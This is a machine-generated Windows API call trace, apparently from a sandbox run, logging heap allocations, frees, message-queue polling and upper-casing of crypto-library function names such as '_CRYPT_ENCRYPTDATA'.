[0128.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0128.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0128.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0128.562] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0128.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0128.563] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0128.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0128.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0128.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0128.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0128.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0128.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0128.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0128.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8fc) returned 0x2ea0340 [0128.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0128.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0128.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0128.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0128.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0128.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8fc) returned 0x2ebf550 [0128.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0128.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0128.567] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0128.567] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.568] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0128.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0128.568] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0128.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0128.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0128.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0128.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.569] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0128.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.569] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0128.569] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0128.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0128.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.570] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.570] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0128.570] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0128.570] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0128.570] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0128.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.570] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0128.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0128.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0128.571] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.572] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.572] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.572] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0128.572] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0128.572] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0128.572] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0128.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.572] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.573] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0128.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 